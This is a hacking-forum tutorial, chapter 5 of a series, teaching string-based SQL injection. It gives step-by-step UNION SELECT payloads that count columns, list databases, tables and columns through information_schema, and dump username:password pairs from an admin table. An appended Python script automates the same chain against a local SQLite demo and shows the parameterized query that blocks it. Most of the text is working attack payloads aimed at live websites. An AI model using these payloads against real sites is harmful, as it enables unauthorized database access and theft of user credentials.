Tutorial by Zer0Freak
Difficulty: Easy
Requirements: 10 minutes of reading time, patience and intuition
Previous Chapters:
Chapter1:
http://www.hackforums.net/showthread.php?tid=2059771
Chapter2:
http://www.hackforums.net/showthread.php?tid=2060211
Chapter3:
http://www.hackforums.net/showthread.php?tid=2061628
Chapter4:
http://www.hackforums.net/showthread.php?tid=2085773
Alright, since my previous tutorials haven't had as many responses as I expected (people aren't fond of reading big tutorials), I've decided to keep this one short. As a matter of fact, I'll just make you understand the concepts behind String Based SQL injection. I KNOW there are a lot of tutorials covering the same ground as this one, but I guarantee that if you read this, you won't have any doubts about String Based.
What is String Based SQL injection and how do you notice it?
To keep it simple: String Based SQL injection happens when the site wraps the vulnerable parameter in quotes inside its query, for example WHERE id='10' instead of WHERE id=10. Our input lands inside a string literal, so the site is still vulnerable, but the usual (integer-style) payloads are swallowed by the quotes: nothing we inject is executed, and nothing is displayed.
Common symptoms that show a site is String Based:
Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
normal SQL injection payloads don't work (the site shows a normal page even though it is vulnerable to SQLi)
Solution: how to inject into a site with String Based SQL injection
The answer is to use the following format:
Code:
http://site.com/index.php?id=10' order by 1000--+
The quote ' closes the string the site put around our value, so everything after it is parsed as SQL, and order by 1000 now produces an error just like on an integer-based site. The --+ comments out the rest of the site's original query (including its own closing quote): -- starts a MySQL comment, and the + is decoded by the web server into the space that MySQL requires after --. So the two things to remember are the quote
' and the
+ sign in our query
Now that you've got the point, let's try String Based on some of the other types of SQL injection, shall we
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Increase the number until the page errors. If order by 11 errors and order by 10 does not, the query has 10 columns; we'll use 10 for the rest of this example
2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my previous tutorials before going further with this step
3. Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the table names of the current database (group_concat must be on table_name; table_schema would only repeat the database name)
For this example, we'll be using the table name: "admin"
4. Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+
Results will display the column names of the admin table. 0x61646d696e is "admin" written as a MySQL hex literal; using hex means the payload needs no extra quotes, which matters when the site strips or escapes them
To convert plain text to hex, use:
http://www.swingnote.com/tools/texttohex.php
For this example, we'll use "username" and "password" as our column names
5. Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
Results will display username:password pairs, one per line (0x3a is ':' and 0x0a is a newline)
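The following Python script is an added example, not part of the original tutorial, that reproduces the whole chain above (the quote and --+ trick from the Solution section, column counting with ORDER BY, and the UNION dump) against an in-memory SQLite database standing in for the site's MySQL backend. The "posts" and "admin" tables, the rows in them, and the password hashes are constructed for the demo. Two MySQL-isms are spelled the SQLite way: 0x0a becomes char(10) and string joining uses || instead of extra group_concat arguments. The vulnerable lookup is built exactly like a WHERE id='...' PHP page, next to the parameterized version that stops the same payload.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample schema: the public "posts" table that index.php?id=...
# queries, plus a separate "admin" table we want to reach via UNION.
SCHEMA = """
CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO posts VALUES (10, 'Hello', 'first post'), (11, 'World', 'second');
CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO admin VALUES (1, 'admin',  '5f4dcc3b5aa765d61d8327deb882cf99'),
                         (2, 'editor', 'e10adc3949ba59abbe56e057f20f883e');
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def decode_param(raw):
    """What the web server hands the script: '+' in a query string becomes a
    space, so '--+' arrives as '-- ' (comment plus the space MySQL needs;
    SQLite accepts '--' without the space but the decoding is the same)."""
    return unquote_plus(raw)


def vulnerable_lookup(conn, id_param):
    """The String Based pattern: the value is wrapped in quotes and glued into
    the SQL text. Returns the rows, or the error text if the SQL breaks."""
    sql = "SELECT id, title, body FROM posts WHERE id='%s'" % id_param
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as e:
        return "ERROR: %s" % e


def safe_lookup(conn, id_param):
    """Hardened form: a bound parameter. The payload stays a plain value that
    matches no row; it can never become part of the SQL grammar."""
    return conn.execute(
        "SELECT id, title, body FROM posts WHERE id=?", (id_param,)
    ).fetchall()


def count_columns(conn, max_cols=20):
    """Step 1: raise ORDER BY n until the database errors; the last n that
    worked is the number of columns in the site's SELECT."""
    for n in range(1, max_cols + 1):
        payload = decode_param("10' order by %d--+" % n)
        if isinstance(vulnerable_lookup(conn, payload), str):
            return n - 1
    return None


def dump_admin(conn, ncols):
    """Step 5: put group_concat(username:password) in one of the ncols slots.
    SQLite spelling of the tutorial's group_concat(username,0x3a,password,0x0a)."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[1] = "group_concat(username||':'||password, char(10))"
    payload = decode_param("-1' union select %s from admin--+" % ",".join(cols))
    rows = vulnerable_lookup(conn, payload)
    if isinstance(rows, str) or not rows:
        return None
    return rows[0][1]


if __name__ == "__main__":
    db = fresh_db()
    # Without the quote the probe is swallowed by the string: no error at all
    # (MySQL would even return the normal id=10 page, SQLite just no rows).
    print(vulnerable_lookup(db, decode_param("10 order by 1000--+")))
    # With the quote the ORDER BY really runs and errors as the tutorial says.
    print(vulnerable_lookup(db, decode_param("10' order by 1000--+")))
    n = count_columns(db)
    print("columns:", n)
    print(dump_admin(db, n))
    print("parameterized:", safe_lookup(db, decode_param("-1' union select 1,2,3 from admin--+")))
```

Run it and compare the two probes at the top of the main block: the unquoted one returns quietly, the quoted one errors with an out-of-range ORDER BY, which is the signal the tutorial uses to tell a String Based site apart from a non-vulnerable one.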
The same quote and --+ trick works with Error Based, Blind Based and the other types of SQL injection; only the payload around it changes
Please refer to my previous tutorials to learn more about Error Based and Union Based
This is a mini tutorial for String Based SQL injection. I just hope people understand it as they go on their journey through SQL injection
Hope you guys enjoy this. It's pretty much the concept you need when you SQLi
End of Chapter 5
Upcoming Chapter: Blind Based SQL Injection Detailed
Contact me via PM
or
Email: zerofreak@live.com
Have a great day